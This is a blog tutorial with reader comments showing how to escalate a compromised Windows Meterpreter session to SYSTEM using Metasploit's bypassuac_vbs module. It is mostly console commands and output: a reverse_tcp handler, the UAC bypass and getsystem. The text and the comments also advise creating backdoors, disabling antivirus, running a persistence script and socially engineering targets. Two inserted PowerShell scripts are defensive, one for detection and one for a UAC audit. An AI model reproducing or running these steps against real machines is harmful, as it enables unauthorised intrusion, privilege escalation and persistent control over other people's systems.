Hacking any Windows system is an easy process with Metasploit. We can use many techniques to compromise Windows, either by exploiting a remote code execution vulnerability or through a malicious file attack. The code is often embedded in a genuine application or executed remotely by an application with limited privileges, so when we use the getsystem command it returns the error "Access is denied".

To get SYSTEM-level or admin privileges we have to execute as admin, which is monitored by Windows UAC. UAC can check for a verified publisher and certificate info. Asking for admin privileges from a malicious executable is bad practice: a malicious file asking for privileges can alert the user, whereas code without admin privileges can run in the background without causing much distraction.

In Metasploit we have plenty of exploits to escalate the privileges of an existing Meterpreter session. Here we use the bypassuac_vbs exploit to escalate Meterpreter's privileges. This exploit bypasses UAC in the background without asking for confirmation. We have other exploits like bypassuac and bypassuac_injection, but they can alert the user.

Demo Video
You need an updated version of Metasploit; msf5 is used in this tutorial. This exploit is for a previously compromised system, i.e. we already need a Meterpreter session running in the background. Check my blog post on How to hack Windows 10 using Kali Linux remotely with Metasploit 2016 if you don't know how to compromise a Windows system (Win 10/8/8.1/7/Vista/XP).

+ -- --=[ metasploit v4.11.5-2016010401 ]
+ -- --=[ 1518 exploits - 875 auxiliary - 257 post ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost
lhost =>
msf exploit(handler) > set lport 444
lport => 444
msf exploit(handler) > exploit
[*] Started reverse TCP handler on
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to
[*] Meterpreter session 2 opened ( -> at 2016-07-17 06:08:32 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : USER-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Logged On Users : 2
Meterpreter : x86/win32
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter >

As you can see, the getsystem command didn't work. Now background the session using the command below:

meterpreter > background
[*] Backgrounding session 1...

bypassuac exploit

Once you have a session, background it in the Metasploit handler and change the module to bypassuac_vbs:

msf exploit(handler) > use exploit/windows/local/bypassuac_vbs

Set the session ID:

msf exploit(bypassuac_vbs) > set session 1
session => 1

Exploit the target; a new Meterpreter session will be spawned:

msf exploit(bypassuac_vbs) > exploit
[*] Started reverse TCP handler on
[+] Windows 7 (Build 7601, Service Pack 1). may be vulnerable.
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Uploading the Payload VBS to the filesystem...
[*] Sending stage (957487 bytes) to
[*] Meterpreter session 3 opened ( -> at 2016-07-17 06:12:47 -0400
[+] Deleted C:\Users\user\AppData\Local\Temp\ZPqcIxHe.vbs
meterpreter >
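The module output above exposes one host-side artifact a defender can watch for: a .vbs script written into the user's AppData\Local\Temp folder and removed again a few seconds later. The following PowerShell is an added example, not code from the post or from Metasploit, that applies that observation as a detection rule over Sysmon-style FileCreate (Event ID 11) records. The three records are constructed for the demonstration (the writer process and file names are made up; the post does not say which process wrote the script), the field names follow Sysmon's Event 11 schema, and the rule is generalised to the other Windows script-host extensions as well as .vbs.

```powershell
# Added example: flag script files dropped into a user's Temp folder.
# Sample records are constructed for this demonstration; on a live host they
# would come from the Microsoft-Windows-Sysmon/Operational log instead.
$sampleEvents = @(
    [pscustomobject]@{ UtcTime = '2016-07-17 10:12:40'; EventId = 11
                       Image = 'C:\Users\user\Downloads\invoice.exe'          # constructed writer
                       TargetFilename = 'C:\Users\user\AppData\Local\Temp\ZPqcIxHe.vbs' },
    [pscustomobject]@{ UtcTime = '2016-07-17 10:12:41'; EventId = 11
                       Image = 'C:\Windows\System32\wscript.exe'
                       TargetFilename = 'C:\Users\user\AppData\Local\Temp\report.tmp' },   # not a script
    [pscustomobject]@{ UtcTime = '2016-07-17 10:13:05'; EventId = 11
                       Image = 'C:\Program Files\Installer\setup.exe'
                       TargetFilename = 'C:\Users\user\Documents\notes.vbs' }              # not in Temp
)

function Find-TempScriptDrops {
    param([Parameter(Mandatory = $true)][object[]]$Events)

    # Script-host file types; the post's case is .vbs, the rest are the other
    # extensions wscript/cscript/mshta will execute directly.
    $scriptExt = '\.(vbs|vbe|js|jse|wsf|wsh|hta)$'
    # Any user's AppData\Local\Temp, the location shown in the module output.
    $userTemp  = '\\Users\\[^\\]+\\AppData\\Local\\Temp\\'

    $Events |
        Where-Object { $_.EventId -eq 11 } |
        Where-Object { $_.TargetFilename -match $userTemp -and $_.TargetFilename -match $scriptExt } |
        ForEach-Object {
            [pscustomobject]@{
                Time   = $_.UtcTime
                Writer = $_.Image
                Script = $_.TargetFilename
                Reason = 'Script file written to user Temp folder'
            }
        }
}

# Only the first record matches: a script extension inside AppData\Local\Temp.
Find-TempScriptDrops -Events $sampleEvents | Format-Table -AutoSize
```

The rule is deliberately narrow: it keys on location and extension rather than on the random file name, which a module can change freely, and it reports the writing process so an analyst can see whether the script came from a browser download, an installer or something unexpected. Because the module deletes the script almost immediately, a FileCreate-time rule like this catches what a scheduled on-disk scan never sees.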

The new Meterpreter session runs with escalated privileges; try the getsystem command to check. Once you have SYSTEM, you are the admin/owner of that PC:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

Now you can access system files, create multiple backdoors, persist the session in a system directory, or simply destroy the whole system.
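The module's own pre-checks in the output above ("UAC is Enabled", "Part of Administrators group!", "UAC is set to Default") and the "Not in admins group" abort that a reader hits later in the comments together describe exactly the host conditions a defender can change. The following PowerShell is an added example, not code from the post or from Metasploit, that audits those conditions on a Windows host: the UAC slider values under the Policies\System registry key (Windows defaults are assumed when a value has never been written) and whether the current token belongs to local Administrators. It assumes Windows PowerShell 3.0 or later and uses whoami.exe so that a UAC-filtered admin token still shows its Administrators membership, which Windows lists as "Group used for deny only".

```powershell
# Added example: report the UAC posture the bypassuac modules' pre-checks key on.
function Get-UacPosture {
    $policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $policy = Get-ItemProperty -Path $policyKey -ErrorAction Stop

    # UAC slider values; the Windows default is assumed when a value is absent.
    $enableLua  = if ($null -ne $policy.EnableLUA) { [int]$policy.EnableLUA } else { 1 }
    $consent    = if ($null -ne $policy.ConsentPromptBehaviorAdmin) { [int]$policy.ConsentPromptBehaviorAdmin } else { 5 }
    $secureDesk = if ($null -ne $policy.PromptOnSecureDesktop) { [int]$policy.PromptOnSecureDesktop } else { 1 }

    # Local Administrators (S-1-5-32-544) membership of the current token. A
    # non-elevated admin still lists the group, flagged as deny-only.
    $groups = whoami /groups /fo csv | ConvertFrom-Csv
    $adminEntry = $groups | Where-Object { $_.SID -eq 'S-1-5-32-544' }
    $isAdminMember = $null -ne $adminEntry
    $isElevated = $isAdminMember -and ($adminEntry.Attributes -notmatch 'deny only')

    $findings = New-Object System.Collections.Generic.List[string]
    if ($enableLua -ne 1) {
        $findings.Add('UAC is disabled (EnableLUA=0): administrators always receive a full token, so there is nothing to bypass.')
    } elseif ($consent -eq 5) {
        $findings.Add('Admin prompt level is Default (ConsentPromptBehaviorAdmin=5): auto-elevating Windows binaries are trusted silently, the setting the bypassuac output reports as bypassable.')
    } elseif ($consent -eq 0) {
        $findings.Add('Admin prompt level is Never notify (ConsentPromptBehaviorAdmin=0): elevation happens without any prompt.')
    } else {
        # Values 1-4 always prompt; the bypassuac module family aborts at its level check here.
        $findings.Add("Admin prompt level $consent prompts on every elevation; the bypassuac modules stop at their level check.")
        if ($consent -ne 2 -or $secureDesk -ne 1) {
            $findings.Add('Harden to Always notify: ConsentPromptBehaviorAdmin=2 with PromptOnSecureDesktop=1.')
        }
    }
    if ($isAdminMember -and -not $isElevated) {
        $findings.Add('Current user is in local Administrators with a filtered token: this is the precondition the module requires. Day-to-day accounts should be standard users, which produces the "Not in admins group" abort.')
    } elseif (-not $isAdminMember) {
        $findings.Add('Current user is not in local Administrators: the module aborts with "Not in admins group".')
    }

    [pscustomobject]@{
        EnableLUA                  = $enableLua
        ConsentPromptBehaviorAdmin = $consent
        PromptOnSecureDesktop      = $secureDesk
        AdministratorsMember       = $isAdminMember
        Elevated                   = $isElevated
        Findings                   = $findings.ToArray()
    }
}

Get-UacPosture | Format-List
```

Run it as the interactive user whose token you want to assess, not from an already elevated prompt, or the membership finding will describe the elevated token instead. The two findings that matter most map directly to the post: "UAC is set to Default" corresponds to ConsentPromptBehaviorAdmin=5, and the reader's "Not in admins group" abort is what you get when the everyday account is a standard user.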


Susmith Krishnan

I'm a computer enthusiast basically and I love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and I would like to explore security vulnerabilities and the latest tech news and share them with you.


YummY · August 25, 2016 at 4:04 pm

Do you guys have twitter? How to contact you?

Darwin · January 18, 2017 at 11:15 am

So you could access the windows user interface of the compromised system without having the user open an infected .exe?

    susmith HCK · January 18, 2017 at 10:19 pm

    No, for that you need a persistent shell.

Mukul Gaur · April 22, 2017 at 6:05 pm

Great Blog

Cryptr · May 11, 2017 at 7:27 am

I’ve tried several ways to escalate without luck. Will the vbs method get caught by defender when the payload is sent to the target system? On most of the other attempts the payload was caught. I’m hoping I don’t need to encrypt the payload before it’s sent.

    susmith HCK · May 11, 2017 at 5:20 pm

    VBS is less likely to be detected, because it's usually treated as a simple program used by the system. Unless you run a scan on the file specifically, mostly it will remain undetected. The moment you get privileges, disable AV.

Cryptr · May 12, 2017 at 2:13 am

Yes, I can confirm that VBS does not even work for Windows 10; however, the ask does work with modifications. In other words, you have to create a program and package the payload inside that program along with registry modifications that shut off Windows Defender; once Defender is down you can execute the payload and escalate your privileges as normal.

    Cryptr · May 12, 2017 at 2:18 am

    A little caveat to that: unfortunately you have to use really good social engineering skills to get your target to click on the package and install it.

    Cryptr · May 12, 2017 at 3:50 pm

    VBS does work on Windows 7, and I was able to get it working with little effort with Defender up.

Aris Melachroinos · May 13, 2017 at 7:57 pm

How do I persist the session in the system directory?

    susmith HCK · May 14, 2017 at 11:08 am

    Run the persistence Meterpreter script, for example: run persistence -U -i 5 -p 555 -r

aime · May 25, 2017 at 2:49 pm

I am getting the following error (Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module) as the local user does not belong to the admin group:

msf exploit(bypassuac_vbs) > exploit

[*] Started reverse TCP handler on
[+] Windows 7 (Build 7601, Service Pack 1). may be vulnerable.
[*] UAC is Enabled, checking level...
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
[*] Exploit completed, but no session was created.
msf exploit(bypassuac_vbs) >

    susmith HCK · May 27, 2017 at 10:12 pm

    This exploit won't work on the target system because of its group policy, i.e. the target is secured and is not vulnerable to this exploit.

      blabla · September 2, 2017 at 11:35 pm

      It's like that for me too.
      What can we do?

sergio · June 3, 2017 at 11:26 pm

It works, thanks for sharing.
